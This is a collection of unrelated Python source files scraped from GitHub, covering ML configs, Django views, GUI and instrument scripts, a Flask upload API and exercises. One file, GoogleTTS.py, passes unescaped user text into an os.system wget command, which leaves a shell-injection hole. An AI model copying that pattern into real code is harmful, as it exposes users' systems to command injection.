{"seq_id":"721491099","text":"# Habitat configs\n# This should be sourced by the evaluate script,\n# which must save a sacred experiment in the variable \"ex\"\nfrom evkit.utils.misc import remove_whitespace\nimport os\n\n@ex.config\ndef cfg_base():\n    cfg = {}\n    uuid = \"\"\n    config_file = os.path.join(os.getcwd(), 'habitat-api/configs/tasks/pointnav_gibson_val.yaml')\n    cfg['eval_kwargs'] = {\n        'exp_path': '/mnt/logdir/keypoints3d_encoding_restart1',\n        'weights_only_path': None,\n        'challenge': True,  # True for challenge.submit() False for benchmark.evaluate()\n        'debug': False,  # forces visdom and logs videos\n        'overwrite_configs': True,  # for experiments that are not up to date with latest configs, upload this run's cfg into the experiments\n        'benchmark_episodes': 10,  # up to 994\n        'benchmark_config': config_file,\n    }\n\n@ex.named_config\ndef weights_only():\n    cfg = {}\n    cfg['eval_kwargs'] = {\n        'exp_path': None,\n        'weights_only_path': '/mnt/eval_runs/curvature_encoding_moresteps_collate5/checkpoints/weights_and_more-latest.dat',\n    }\n\n\n@ex.named_config\ndef cfg_overwrite():\n    cfg = {}\n    uuid = \"_overwrite\"\n    cfg['learner'] = {\n        'taskonomy_encoder': '/mnt/models/keypoints3d_encoder.dat',  # 'None' for random projection, 'pixels_as_state' for pixels as state\n        'perception_network': 'features_only',\n        'encoder_type': 'taskonomy',  # 'taskonomy' for regular encoder or 'atari' for student nets\n        'backout': {\n            'use_backout': True,\n            'patience': 80,\n            'unstuck_dist': 0.3,\n            'randomize_actions': True,\n            'backout_type': 'hardcoded',  # hardcoded, trained\n            'backout_ckpt_path': '/mnt/logdir/curvature_encoding_moresteps_collate/checkpoints/ckpt-latest.dat',  # note this one is ckpt path since we do not need configs\n            'num_takeover_steps': 8,\n        },\n        'validator': {\n            'use_validator': True,\n            'validator_type': 'jerk'\n        }\n    }\n    image_dim = 84\n    cfg['env'] = {\n        'sensors': {\n            'features': None,\n            'taskonomy': None,\n            'map': None,\n            'target': None,\n            'global_pos': None,\n        },\n        'collate_env_obs': False,\n        'env_gpus': [0],\n        'transform_fn': \"TransformFactory.independent({{'taskonomy':taskonomy_features_transform('{taskonomy_encoder}', encoder_type='{encoder_type}'), 'map':image_to_input_pool((3,{image_dim},{image_dim})), 'target':identity_transform(), 
'global_pos':identity_transform()}}, keep_unnamed=False)\".format(encoder_type=cfg['learner']['encoder_type'], taskonomy_encoder=cfg['learner']['taskonomy_encoder'], image_dim=image_dim),\n 'use_target': True,\n 'use_map': True,\n 'habitat_map_kwargs': {\n 'map_building_size': 22, # in meters\n 'map_max_pool': False,\n 'use_cuda': False,\n 'history_size': None,\n },\n 'env_specific_kwargs': {\n 'target_dim': 16, # Taskonomy reps: 16, scratch: 9, map_only: 1\n },\n 'transform_fn_pre_aggregation': \"\"\"\n TransformFactory.independent(\n {\n 'taskonomy':rescale_centercrop_resize((3,256,256)),\n },\n keep_unnamed=True)\n \"\"\".translate(remove_whitespace),\n 'transform_fn_post_aggregation': \"\"\"\n TransformFactory.independent(\n {{\n 'taskonomy':taskonomy_features_transform('{taskonomy_encoder}'),\n 'target':identity_transform(),\n 'map':map_pool_collated((3,84,84)),\n 'global_pos':identity_transform(),\n }},\n keep_unnamed=False)\n \"\"\".translate(remove_whitespace).format(\n taskonomy_encoder='/mnt/models/normal_encoder.dat'),\n }\n cfg['training'] = {\n 'seed': 42\n }\n del image_dim\n\n","repo_name":"alexsax/midlevel-reps","sub_path":"configs/habitat_eval.py","file_name":"habitat_eval.py","file_ext":"py","file_size_in_byte":3966,"program_lang":"python","lang":"en","doc_type":"code","stars":103,"dataset":"github-code","pt":"37"} +{"seq_id":"37426721330","text":"'''\n@file : readData.py\n@time : Mar 17,2016 16:24\n@author : duanxxnj@163.com\n'''\n\nimport cv2\n\nimport numpy as np\nimport pandas as pd\n\nimg = pd.read_csv('test.csv')\n\np1 = img.values[10]\npix = []\n\nfor i in range(28):\n pix.append([])\n for j in range(28):\n pix[i].append(p1[i*28 + j])\n\nnppix = np.array(pix)\n\ncv2.imshow(\"image\", np.array(pix))\ncv2.waitKey()","repo_name":"Duanxx/MachineLearningProjects","sub_path":"DigitRecognizer/readData.py","file_name":"readData.py","file_ext":"py","file_size_in_byte":373,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"10822629560","text":"#!/usr/bin/python\nimport os\nimport os.path\nimport string\nimport urllib2\nfrom threads.TInterpreterPlaySound import TInterpreterPlaySound\n\n\ndef __internetOn():\n try:\n urllib2.urlopen('http://www.google.com',timeout=1) \n return True\n except urllib2.URLError as err:\n pass\n return False\n\ndef intentar(projectName, texto):\n texto = texto.split(\" \")\n texto = string.join(texto, \"+\")\n\n destino = os.path.join(\"proyectos\", projectName, texto + \".mp3\")\n if os.path.exists(destino): #ya lo tengo, lo reproduzco\n t = TInterpreterPlaySound([destino, ])\n t.start()\n return True\n else: #no lo tengo\n if __internetOn(): #hay internet\n os.system(\"wget -q -U Mozilla -O \\\"\" + destino + \"\\\" \\\"http://translate.google.com/translate_tts?ie=UTF-8&tl=es&q=\" + texto + \"\\\"\")\n t = TInterpreterPlaySound([destino, ])\n t.start()\n return True\n else: #no hay internet y no lo tengo\n return False\n","repo_name":"sugar-activities/4660-activity","sub_path":"speak/GoogleTTS.py","file_name":"GoogleTTS.py","file_ext":"py","file_size_in_byte":1010,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"42764219392","text":"from django.shortcuts import render\r\nfrom .models import Product, Category, ProductImages\r\nfrom django.db.models import Q\r\nfrom django.http import Http404\r\nimport random\r\n# Create your views here.\r\n\r\ndef productsList(request):\r\n try:\r\n products = Product.objects.all()\r\n 
#category = Category.objects.all()\r\n #categorylol = Category.objects.filter(title__in=['clothing', 'skate', 'shoes'])\r\n category = Category.objects.filter(parent__exact=None)\r\n category_list = list(category)\r\n sub_category = Category.objects.filter(parent__in=category_list)\r\n #print(sub_category)\r\n except:\r\n #products = None\r\n raise Http404\r\n template = 'products/products.html'\r\n context = {\r\n 'products': products,\r\n 'category': category,\r\n 'sub_category': sub_category,\r\n }\r\n return render(request, template, context)\r\n # mainCategory = Category.objects.select_related().filter(title = cat)\r\n # allCategories = Category.objects.all()\r\n # products = Product.objects.all()\r\n # template = 'products/products.html'\r\n # context = {\r\n # 'mainCategory': mainCategory,\r\n # 'allCategories': allCategories,\r\n # 'products': products,\r\n # }\r\n # return render(request, template, context)\r\n # except cat.DoesNotExists:\r\n # return productDetail(request, cat)\r\n\r\ndef productsSale(request):\r\n try:\r\n products = Product.objects.all()\r\n #category = Category.objects.all()\r\n #categorylol = Category.objects.filter(title__in=['clothing', 'skate', 'shoes'])\r\n category = Category.objects.filter(parent__exact=None)\r\n category_list = list(category)\r\n sub_category = Category.objects.filter(parent__in=category_list)\r\n #print(sub_category)\r\n except:\r\n #products = None\r\n raise Http404\r\n template = 'products/sale.html'\r\n context = {\r\n 'products': products,\r\n 'category': category,\r\n 'sub_category': sub_category,\r\n }\r\n return render(request, template, context)\r\n\r\ndef category(request, cat):\r\n #print(subCategories)\r\n try:\r\n #products = Category.objects.select_related().get(title=cat)\r\n #products = Category.objects.select_related().get(title=cat).product_set.all()\r\n products = Product.objects.filter(category__parent__title=cat)\r\n subCategories = Category.objects.get(title=cat).category_set.all()\r\n except:\r\n #products = None\r\n #subCategories = None\r\n raise Http404\r\n template = 'products/category.html'\r\n context = {\r\n 'products': products,\r\n 'category': cat,\r\n 'subCategories': subCategories\r\n }\r\n #print(products)\r\n return render(request, template, context)\r\n\r\ndef subCategory(request, cat, subcat):\r\n try:\r\n products = Product.objects.filter(category__title=subcat)\r\n subCategories = Category.objects.get(title=cat).category_set.all()\r\n #check = Category.objects.filter(title=subcat)\r\n if not Category.objects.filter(title=subcat).exists():\r\n raise Http404\r\n except:\r\n #products = None\r\n #subCategories = None\r\n raise Http404\r\n template = 'products/category.html'\r\n context = {\r\n 'products': products,\r\n 'category': cat,\r\n 'subCategory': subcat,\r\n 'subCategories': subCategories,\r\n }\r\n print(products)\r\n #print(subcat)\r\n #print(subCategories)\r\n #print(check)\r\n return render(request, template, context)\r\n\r\ndef productDetail(request, cat, subcat, slug):\r\n try:\r\n products = Product.objects.get(slug=slug)\r\n # random_products = Product.objects.filter(category__title=subcat)\r\n products_id_list = list(Product.objects.filter(category__title=subcat).values_list('id', flat=True))\r\n random_products_id_list = random.sample(products_id_list, min(len(products_id_list), 3))\r\n random_products = Product.objects.filter(id__in=random_products_id_list)\r\n # random_products_id_list = random.sample(cat_products_id_list, min(len(cat_products_id_list), 3))\r\n product_image = 
ProductImages.objects.filter(product__slug=slug)\r\n    except:\r\n        #products = None\r\n        raise Http404\r\n    template = 'products/productsDetail.html'\r\n    context = {\r\n        'p': products,\r\n        'cat': cat,\r\n        'subcat': subcat,\r\n        'slug': slug,\r\n        'random_products': random_products,\r\n        'product_image': product_image,\r\n        'subcat_s': subcat[:len(subcat)-1],\r\n    }\r\n    return render(request, template, context)\r\n\r\ndef search(request):\r\n    try:\r\n        s = request.GET['search']\r\n    except:\r\n        s = None\r\n        # raise Http404\r\n    if s:\r\n        products = Product.objects.filter(Q(title__icontains=s) | Q(category__title=s))\r\n    else:\r\n        products = None\r\n    template = 'search/search.html'\r\n    context = {\r\n        'query': s,\r\n        'products': products,\r\n    }\r\n    return render(request, template, context)\r\n    #print(s)","repo_name":"raczu/django-ecommerce","sub_path":"products/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5093,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"28389959535","text":"import Tkinter as tk\nimport tkFont\n'''\nCreated on Sep 23, 2014\nA text widget with a new method, highlight_pattern\n\n  example:\n\n  text = CustomText()\n  text.tag_configure(\"red\",foreground=\"#ff0000\")\n  text.highlight_pattern(\"this should be red\", \"red\")\n\n  The highlight_pattern method is a simplified python\n  version of the tcl code at http://wiki.tcl.tk/3246\n\n@author: amita\n'''\nclass CustomText(tk.Text):\n\n    def __init__(self,text):\n        tk.Text.__init__(self)\n        self.insert(tk.INSERT ,text)\n\n    def highlight_pattern(self, pattern, tag, start=\"1.0\", end=\"end\", regexp=False):\n        '''Apply the given tag to all text that matches the given pattern\n\n        If 'regexp' is set to True, pattern will be treated as a regular expression\n        '''\n\n        start = self.index(start)\n        end = self.index(end)\n        self.mark_set(\"matchStart\",start)\n        self.mark_set(\"matchEnd\",start)\n        self.mark_set(\"searchLimit\", end)\n\n        countVar = tk.StringVar()\n        while True:\n            # search for the pattern from the end of the previous match up to the limit\n            index = self.search(pattern, \"matchEnd\", \"searchLimit\", count=countVar, regexp=regexp)\n            if index == \"\": break\n            self.mark_set(\"matchStart\", index)\n            self.mark_set(\"matchEnd\", \"%s+%sc\" % (index,countVar.get()))\n            self.tag_add(tag, \"matchStart\",\"matchEnd\")\n\n\nif __name__ == '__main__':\n    text = CustomText(\"this should be red\")\n    text.tag_configure(\"red\",foreground=\"#ff0000\")\n    text.highlight_pattern(\"this should be red\", \"red\")\n    ","repo_name":"amitamisra/Summary_Dialogs","sub_path":"Summary/src/GUI/DisplayArguments_PDTBParser.py","file_name":"DisplayArguments_PDTBParser.py","file_ext":"py","file_size_in_byte":1504,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"30282821080","text":"# SUMMING ONLY THE EVEN NUMBERS\n\na = []\ns = 0\np = 0\nfor i in range(0, 6):\n    n = int(input('Enter number {}: _ ' .format(i + 1)))\n    a.append(n)\n    if n % 2 == 0:  # the number entered is even\n        s += n\n        p += 1\n\nprint('\\nYou entered the following numbers:')\nfor i in a:\n    print(i, end=' ')\n\nprint('\\n\\nOf these, {} are even:' .format(p))\nfor i in a:\n    if i % 2 == 0:\n        print(i, end=' ')\n\nprint('\\n\\nThe sum of the numbers mentioned above is {}.' 
.format(s))","repo_name":"pbittencourt/datasciencestudies","sub_path":"guanabara/Exercicios/mundo 2 _ aulas 12 a 15/050.py","file_name":"050.py","file_ext":"py","file_size_in_byte":485,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"34806193428","text":"import time\nfrom turtle import Screen\nfrom player import Player\nfrom car_manager import CarManager\nimport time\nfrom scoreboard import Scoreboard\n\nscoreboard = Scoreboard()\nscreen = Screen()\nscreen.setup(width=600, height=600)\nscreen.tracer(0)\nplayer = Player()\ncars = CarManager()\n\nscreen.listen()\n\n\nscreen.onkey(player.up,\"Up\")\nscreen.onkey(player.down, \"Down\")\ngame_is_on = True\nwhile game_is_on:\n\n time.sleep(cars.speed)\n screen.update()\n cars.create_cars()\n cars.move()\n\n if player.ycor()>=280:\n scoreboard.increment_score()\n cars.increase_speed()\n player.return_to_origin()\n for car in cars.all_cars:\n if car.distance(player)<=15:\n scoreboard.game_over()\n game_is_on = False\n\n\nscreen.exitonclick()","repo_name":"Aizad-eng/Turtle-crossing-game","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":770,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"73330690346","text":"\"\"\"\n\nCreated on 2022/02\n\nAuthor: Jahns_P\nVersion Number: 2\nDate of last change: 2022/02/16\nRequires: R&S HMF25xx, FW 02.301 or newer\n- Installed RsInstrument Python module (see https://rsinstrument.readthedocs.io/en/latest/)\n- Installed VISA e.g. R&S Visa 5.12.x or newer\n\nDescription: Send an ARB waveform to the instrument and provide the ARB signal to the output\n\nGeneral Information:\nThis example does not claim to be complete. All information has been\ncompiled with care. However, errors can not be ruled out.\n\"\"\"\n\nfrom RsInstrument import *\nfrom time import sleep\n\n\nRsInstrument.assert_minimum_version('1.53.0')\ninstr = RsInstrument('TCPIP::10.205.0.72::5025::SOCKET', True, True, # Init with IDN query and reset\n \"SelectVisa='rs',\" # VISA type selection (valid parameters: rs or ni)\n \" Termination Character='\\n',\" # Just to show how this is done. \\n ist standard termination. 
\n \" AssureWriteWithTermChar = True\") # Be sure to have all commands terminated with \\n\nsleep(1)\nidn = instr.query_str('*IDN?')\nprint(f\"\\nHello, I am: '{idn}'\")\n\n# We assume the following amplitude values to be defined for a triangle waveform:\n# 0 / 32767 / 0 / -32768 / 0\nbin_data = bytes([00, 00, 0x7F, 0xFF, 00, 00, 0x80, 00, 00, 00])\ninstr.write_bin_block(\"DATA \", bin_data) # Transfer the ARB data to the instrument\ninstr.write_str('FREQ 3000') # Set Frequency to 3 kHz\ninstr.write_str('VOLT 2') # Voltage is 2 V(pp) now\ninstr.write_str('FUNC:ARB RAM') # Arbitrary function working from memory\ninstr.query_opc()\ninstr.write_str('FUNC ARB') # Change to ARB mode\ninstr.write_str('OUTP ON') # Switch output on\ninstr.query_opc()\n\nprint('\\n')\nprint('Arb File transferred to memory, ARB mode is active, output state is ON')\n\ninstr.close() # And close the connection finally\n","repo_name":"Rohde-Schwarz/Examples","sub_path":"Misc/Python/RsInstrument/RsInstrument_HMF25xx_load_ARB_man.py","file_name":"RsInstrument_HMF25xx_load_ARB_man.py","file_ext":"py","file_size_in_byte":1828,"program_lang":"python","lang":"en","doc_type":"code","stars":69,"dataset":"github-code","pt":"37"} +{"seq_id":"42087149082","text":"n, l, k = map(int, input().split())\nquestions = []\n\nfor _ in range(n):\n sub1, sub2 = map(int, input().split())\n questions.append((sub1, sub2))\n\nquestions.sort(key=lambda x : x[1])\n\neasy = hard = 0\nfor x, y in questions:\n if k == 0:\n break\n if l >= y:\n hard += 1\n k -= 1\n elif l >= x:\n easy += 1\n k -= 1\n\nresult = hard * 140 + easy * 100\nprint(result)","repo_name":"subinmun1997/my_python-for-coding-test","sub_path":"BAEKJOON/solution579.py","file_name":"solution579.py","file_ext":"py","file_size_in_byte":400,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"37829427847","text":"# https://adventofcode.com/2022/day/5\n\n\n# [F] [L] [M] \n# [T] [H] [V] [G] [V] \n# [N] [T] [D] [R] [N] [D] \n# [Z] [B] [C] [P] [B] [R] [Z] \n# [M] [J] [N] [M] [F] [M] [V] [H]\n# [G] [J] [L] [J] [S] [C] [G] [M] [F]\n# [H] [W] [V] [P] [W] [H] [H] [N] [N]\n# [J] [V] [G] [B] [F] [G] [D] [H] [G]\n# 1 2 3 4 5 6 7 8 9 \n\ndef main():\n\n l = []\n\n stack = []\n\n supplies = []\n\n with open('input.txt', 'r') as file:\n for line in file:\n if line != '\\n':\n l.append(line)\n else: \n break\n for s in l:\n row = []\n newString = s[1::4]\n for ch in newString:\n row.append(ch)\n stack.append(row)\n stack.pop()\n\n\n n = len(stack)\n for i in range(len(stack[n-1])):\n tmp = []\n for j in range(n-1, -1, -1):\n if stack[j][i] == ' ':\n continue\n else:\n tmp.append(stack[j][i])\n supplies.append(tmp)\n # print(supplies)\n\n# PART ONE (COMMENT PART TWO TO RUN)\n# with open('input.txt', 'r') as file:\n# for line in file:\n# if 'move' not in line:\n# continue\n# else:\n# move, frm, to = [int(s) for s in line.split() if s.isdigit()]\n\n# for i in range(move):\n# tmp = supplies[frm-1].pop()\n# supplies[to-1].append(tmp)\n\n# PART TWO (COMMENT PART ONE TO RUN)\n with open('input.txt', 'r') as file:\n for line in file:\n if 'move' not in line:\n continue\n else:\n move, frm, to = [int(s) for s in line.split() if s.isdigit()]\n\n tmpList = []\n for i in range(move):\n tmp = supplies[frm-1].pop()\n tmpList.append(tmp)\n\n\n tmpList.reverse()\n for i in range(len(tmpList)):\n supplies[to-1].append(tmpList[i])\n\n\n\n final = ''\n for i in range(len(supplies)):\n final += supplies[i][-1]\n\n print(final)\n\n\n \n\n\n\n\n \n\n\n\n\n\nif 
__name__ == '__main__':\n main()","repo_name":"kennea99/Advent-of-Code-2022","sub_path":"Day 5/supplyStacks.py","file_name":"supplyStacks.py","file_ext":"py","file_size_in_byte":2251,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"14425744679","text":"# Sort an array in wave form\n\ndef sortInWave(arr, n):\n for i in range(0, n - 1, 2):\n if i > 0 and arr[i] < arr[i - 1]:\n arr[i], arr[i - 1] = arr[i - 1], arr[i]\n\n if i < n - 1 and arr[i] < arr[i + 1]:\n arr[i], arr[i + 1] = arr[i + 1], arr[i]\n\n\narr = [10, 90, 49, 2, 1, 5, 23]\nsortInWave(arr, len(arr))\nprint(arr)\n\n\ndef waveForm_sort(arr):\n n = len(arr)\n for i in range(n):\n for j in range(0, n - i - 1):\n if j % 2 == 0:\n if arr[j] > arr[j + 1]:\n arr[j], arr[j + 1] = arr[j + 1], arr[j]\n else:\n if arr[j] < arr[j + 1]:\n arr[j], arr[j + 1] = arr[j + 1], arr[j]\n\n\narr = [3, 1, 4, 2, 5]\nwaveForm_sort(arr)\nprint(arr)\n","repo_name":"rahulktd/python_mini_projects","sub_path":"Task4/1/sort_an_array_in_wave_form.py","file_name":"sort_an_array_in_wave_form.py","file_ext":"py","file_size_in_byte":754,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"31563169778","text":"import glob, os\nimport hashlib\nimport re\nfrom flask import (request, jsonify, url_for, send_from_directory)\nfrom flask_jwt_extended import (jwt_required, get_jwt_identity)\nfrom werkzeug.utils import secure_filename\nfrom PIL import Image\n\nfrom app import (app, mongo)\nfrom app.media.media_utils import (ALLOWED_EXTENSIONS)\nfrom app.media.media_processing import (process_media_file, create_media_directories)\nfrom app.utils.api_responses import (json_success, json_bad_request_error)\n\n\nlog = app.logger\n\n\nNO_FILE_EXISTS = 0\nSAME_FILE_EXISTS = 1\nOTHER_FILE_EXISTS = 2\n\n\n# predefine regex pattern for filename counters (underscore and number directly before file extension)\nfilename_counter_pattern = re.compile('_([0-9]+)$')\n\n\n@app.route('/upload/media', methods=['POST'])\n@jwt_required\ndef on_post_upload_media():\n\n # check if the post request has the file part\n if 'file' not in request.files:\n return json_bad_request_error('NO_FILE_SELECTED', 'no file selected')\n\n uploaded_file = request.files['file']\n # if user does not select a file, the browser also submits an empty part without filename\n if uploaded_file.filename == '':\n return json_bad_request_error('FILE_NAME_MISSING', 'file name missing')\n\n basename, extension = os.path.splitext(uploaded_file.filename)\n\n if not extension:\n return json_bad_request_error('FILE_EXTENSION_NOT_SUPPORTED', 'file extension not supported: ' + uploaded_file.filename)\n\n extension = extension[1:].lower()\n if extension not in ALLOWED_EXTENSIONS:\n return json_bad_request_error('FILE_EXTENSION_NOT_SUPPORTED', 'file extension not supported: ' + uploaded_file.filename)\n\n # save file\n file_name = save_file(uploaded_file)\n\n # process file and pass URLs and meta info\n response = process_media_file(file_name, extension)\n return jsonify(response), 200\n\n\ndef save_file(uploaded_file):\n\n file_name = secure_filename(uploaded_file.filename)\n while True:\n file_path = os.path.join(app.config['UPLOAD_FOLDER'], file_name)\n existing_file = check_existing_file(file_path, uploaded_file)\n if existing_file == OTHER_FILE_EXISTS:\n # try another file name\n file_name = find_alternative_filename(file_name)\n elif existing_file == SAME_FILE_EXISTS:\n # just continue (no need to save the same 
file again)\n return file_name\n else:\n # save file\n uploaded_file.save(file_path)\n return file_name\n\n\ndef check_existing_file(filepath, uploaded_file):\n\n if not os.path.exists(filepath): return NO_FILE_EXISTS\n\n with open(filepath, 'rb') as existing_file:\n existing_hash = generate_hash(existing_file)\n\n uploaded_hash = generate_hash(uploaded_file)\n uploaded_file.seek(0)\n\n if existing_hash == uploaded_hash:\n log.info(f\"file {filepath} with same hash already exists: {existing_hash}\")\n return SAME_FILE_EXISTS\n else:\n log.info(f\"file {filepath} with other hash already exists: {existing_hash} instead of uploaded {uploaded_hash}\")\n return OTHER_FILE_EXISTS\n\n\ndef generate_hash(stream):\n BUF_SIZE = 1048576 # 1 MB\n result = hashlib.sha256()\n while True:\n data = stream.read(BUF_SIZE)\n if not data:\n return result.hexdigest()\n result.update(data)\n\n\ndef find_alternative_filename(filename):\n name, extension = os.path.splitext(filename)\n counter_match = filename_counter_pattern.search(name)\n\n # in case there is no counter yet, insert a new one\n if not counter_match:\n return name + \"_2\" + extension\n\n # otherwise replace the counter\n counter = int(counter_match[1]) + 1\n counter_start = counter_match.start(1)\n counter_end = counter_match.end(1)\n return name[:counter_start] + str(counter) + name[counter_end:] + extension\n\n\n@app.route('/uploads/', methods=['GET'])\ndef on_get_uploaded_file(filename):\n log.info(\"serving upload file \" + filename + \" from \" + app.config['UPLOAD_FOLDER'])\n return send_from_directory(app.config['UPLOAD_FOLDER'], filename)\n\n\n@app.route('/thumbnails/', methods=['GET'])\ndef on_get_thumbnail_file(filename):\n log.info(\"serving thumbnail file \" + filename + \" from \" + app.config['THUMBNAIL_FOLDER'])\n return send_from_directory(app.config['THUMBNAIL_FOLDER'], filename)\n\n\n@app.route('/fullhd/', methods=['GET'])\ndef on_get_fullhd_file(filename):\n log.info(\"serving FullHD file \" + filename + \" from \" + app.config['FULLHD_FOLDER'])\n return send_from_directory(app.config['FULLHD_FOLDER'], filename)\n\n@app.route('/videoframes/', methods=['GET'])\ndef on_get_videoframe_file(filename):\n log.info(\"serving video frame file \" + filename + \" from \" + app.config['VIDEO_FRAME_FOLDER'])\n return send_from_directory(app.config['VIDEO_FRAME_FOLDER'], filename)\n","repo_name":"museum4punkt0/MusOS-museum4punkt0","sub_path":"server/modules/app/api/media_api.py","file_name":"media_api.py","file_ext":"py","file_size_in_byte":4876,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"8051996711","text":"import cartopy as cp # Globe projections\nimport cartopy.util as ccrs_util # Add cyclic\nfrom cartopy.mpl.ticker import LongitudeFormatter, LatitudeFormatter\nfrom scipy.constants import * # Get physics constants\nimport datetime as dt\nfrom mytools.met_tools import *\nfrom mytools.netcdf_tools import *\n\nmonth = '12'\n# Data source\nnc_src_corr = os.environ['DATA']+'/abel/C3RUN_nitrate_corr_2005/scavenging_daily/scavenging_daily_2d_2005'+month+'*.nc'\nnc_src_emep = os.environ['DATA']+'/abel/C3RUN_emep.090318.9433/scavenging_daily/scavenging_daily_2d_2005'+month+'*.nc'\n\ntry:\n data\nexcept NameError:\n data_list = []\n for subdir in (nc_src_corr,nc_src_emep):\n raw_data = []\n print(\"Reading from path %s\" % (os.path.abspath(subdir)))\n # Open dataset\n for file in sorted(glob.glob(subdir)):\n print(\"Reading %s\" % (os.path.basename(file)))\n data = 
xr.open_dataset(file)\n # Defining new time coordinates\n data.coords['time'] = dt.datetime(data['YEAR'], data['MONTH'], data['DAY'])\n raw_data.append(data['dry_O3'])\n # Concatenating the list\n data_list.append(xr.concat(raw_data, dim='time'))\n\nozone_data = [data/mega for data in data_list]\nfor data in ozone_data :\n data.attrs['unit'] = 'Gg'\n# Plot it\nplt.close('all')\nfig1 = plt.figure(1,figsize=(16,9))\nfig1.canvas.set_window_title(\"compare-zonal_average_ozone_drydep-timeline-%s\" % month)\nax11 = plt.subplot(131)\nax12 = plt.subplot(132)\nax13 = plt.subplot(133)\nozone_data[0].mean(dim='lon').plot(ax=ax11, add_colorbar=False)\nozone_data[1].mean(dim='lon').plot(ax=ax12,\n cbar_kwargs={'label':'%s Dry Dep (%s)' %\n ('O$_3$', ozone_data[1].attrs['unit'])})\n\n(100*(ozone_data[1].mean(dim='lon')-ozone_data[0].mean(dim='lon'))/ozone_data[0].mean(dim='lon')).plot(ax=ax13,\n cbar_kwargs={'label':'%s Dry Dep (%s)' %\n ('$\\Delta O_3$', '%')})\nfor ax in fig1.axes:\n ax.set_xlabel('Latitude (deg)')\nax12.set_ylabel('')\nax12.set_yticklabels('')\nax13.set_ylabel('')\nax13.set_yticklabels('')\n\nfig2 = plt.figure(2, figsize=(16,9))\nfig2.canvas.set_window_title(\"compare-zonal_average_ozone_drydep-%s\" % month)\nax21 = plt.subplot(121)\nax22 = plt.subplot(122)\nozone_data[0].sum(dim='time').mean(dim='lon').plot(ax=ax21, label='base')\nozone_data[1].sum(dim='time').mean(dim='lon').plot(ax=ax21, label='emep')\n#for itime in np.arange(len(ozone_data[1].time)):\n# ozone_data[0].isel(time=itime).mean(dim='lon').plot(ax=ax22, ls=':',color='grey')\n# ozone_data[1].isel(time=itime).mean(dim='lon').plot(ax=ax22, ls='--',color='grey')\nozone_data[0].mean(dim='time').mean(dim='lon').plot(ax=ax22, label='base')\nax22.fill_between(ozone_data[0].lat,\n ozone_data[0].mean(dim='time').mean(dim='lon')-\n ozone_data[0].std(dim='time').mean(dim='lon')/np.sqrt(len(ozone_data[1].time)),\n ozone_data[0].mean(dim='time').mean(dim='lon')+\n ozone_data[0].std(dim='time').mean(dim='lon')/np.sqrt(len(ozone_data[1].time)),\n alpha=0.5)\nozone_data[1].mean(dim='time').mean(dim='lon').plot(ax=ax22, label='emep')\nax22.fill_between(ozone_data[0].lat,\n ozone_data[1].mean(dim='time').mean(dim='lon')-\n ozone_data[1].std(dim='time').mean(dim='lon')/np.sqrt(len(ozone_data[1].time)),\n ozone_data[1].mean(dim='time').mean(dim='lon')+\n ozone_data[1].std(dim='time').mean(dim='lon')/np.sqrt(len(ozone_data[1].time)),\n alpha=0.5)\nax21.set_title(\"Zonal average of monthly sums\")\nax21.legend()\nax22.set_title(\"Zonal average and daily variation\")\nax22.legend()\nfor ax in fig2.axes:\n ax.set_xlabel('Latitude (deg)')\n ax.set_ylabel('$O_3^{drydep}$ (%s)' % ozone_data[0].unit)\n# Show it\nplt.show(block=False)\n","repo_name":"ziu1986/python_scripts","sub_path":"OsloCTM3dd/qc_drydep_2.py","file_name":"qc_drydep_2.py","file_ext":"py","file_size_in_byte":3977,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"15797663418","text":"from __future__ import annotations\nfrom dataclasses import dataclass, field\nfrom kiota_abstractions.serialization import AdditionalDataHolder, Parsable, ParseNode, SerializationWriter\nfrom kiota_abstractions.store import BackedModel, BackingStore, BackingStoreFactorySingleton\nfrom typing import Any, Callable, Dict, List, Optional, TYPE_CHECKING, Union\n\nif TYPE_CHECKING:\n from .phone import Phone\n\n@dataclass\nclass OnlineMeetingInfo(AdditionalDataHolder, BackedModel, Parsable):\n # Stores model information.\n backing_store: 
BackingStore = field(default_factory=BackingStoreFactorySingleton(backing_store_factory=None).backing_store_factory.create_backing_store, repr=False)\n\n # Stores additional data not described in the OpenAPI description found when deserializing. Can be used for serialization as well.\n additional_data: Dict[str, Any] = field(default_factory=dict)\n # The ID of the conference.\n conference_id: Optional[str] = None\n # The external link that launches the online meeting. This is a URL that clients launch into a browser and will redirect the user to join the meeting.\n join_url: Optional[str] = None\n # The OdataType property\n odata_type: Optional[str] = None\n # All of the phone numbers associated with this conference.\n phones: Optional[List[Phone]] = None\n # The preformatted quick dial for this call.\n quick_dial: Optional[str] = None\n # The toll free numbers that can be used to join the conference.\n toll_free_numbers: Optional[List[str]] = None\n # The toll number that can be used to join the conference.\n toll_number: Optional[str] = None\n \n @staticmethod\n def create_from_discriminator_value(parse_node: Optional[ParseNode] = None) -> OnlineMeetingInfo:\n \"\"\"\n Creates a new instance of the appropriate class based on discriminator value\n param parse_node: The parse node to use to read the discriminator value and create the object\n Returns: OnlineMeetingInfo\n \"\"\"\n if not parse_node:\n raise TypeError(\"parse_node cannot be null.\")\n return OnlineMeetingInfo()\n \n def get_field_deserializers(self,) -> Dict[str, Callable[[ParseNode], None]]:\n \"\"\"\n The deserialization information for the current model\n Returns: Dict[str, Callable[[ParseNode], None]]\n \"\"\"\n from .phone import Phone\n\n from .phone import Phone\n\n fields: Dict[str, Callable[[Any], None]] = {\n \"conferenceId\": lambda n : 